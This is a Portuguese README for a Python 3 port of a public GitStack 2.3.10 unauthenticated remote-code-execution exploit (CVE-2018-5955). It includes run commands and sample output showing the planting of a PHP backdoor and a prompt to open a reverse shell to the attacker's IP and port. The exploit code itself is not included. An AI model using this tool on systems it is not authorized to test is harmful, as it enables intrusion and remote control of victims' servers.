
Um exploit para CVE-2018-5955 GitStack 2.3.10 RCE não autenticado
Um exploit para CVE-2018-5955 GitStack 2.3.10 RCE não autenticado
Exploit: GitStack 2.3.10 Execução Remota de Código Não Autenticada
Data: 18.01.2018
Link do Software: https://gitstack.com/
Autor do Exploit: Kacper Szurek
Exploit Original: https://www.exploit-db.com/exploits/43777
Website: https://security.szurek.pl/
Categoria: remoto
CVE: CVE-2018-5955
Data: 23.06.2023
Novos recursos: RCE interativo, detecção de SO, função de reverse shell, adaptado de python2 para python3
CVE: CVE-2018-5955
Categoria: remoto
Não me responsabilizo pelas suas ações, pois publiquei no github para fins educacionais ou para testes de penetração certificados e autorizados
Instale os requisitos:
pip install colorama
Então, você pode executá-lo com:
python3 exploit.py
O SO será detectado depois que você explorar o CVE; na verdade, haverá esta linha de saída: "[*] OS: $operatingsystem" (demonstração abaixo)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Você também pode digitar "os" para descobrir qual é o tipo de sistema operacional
Para obter um reverse shell real no alvo, você pode digitar "shell" e depois informar seu IP e sua porta de escuta, assim:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE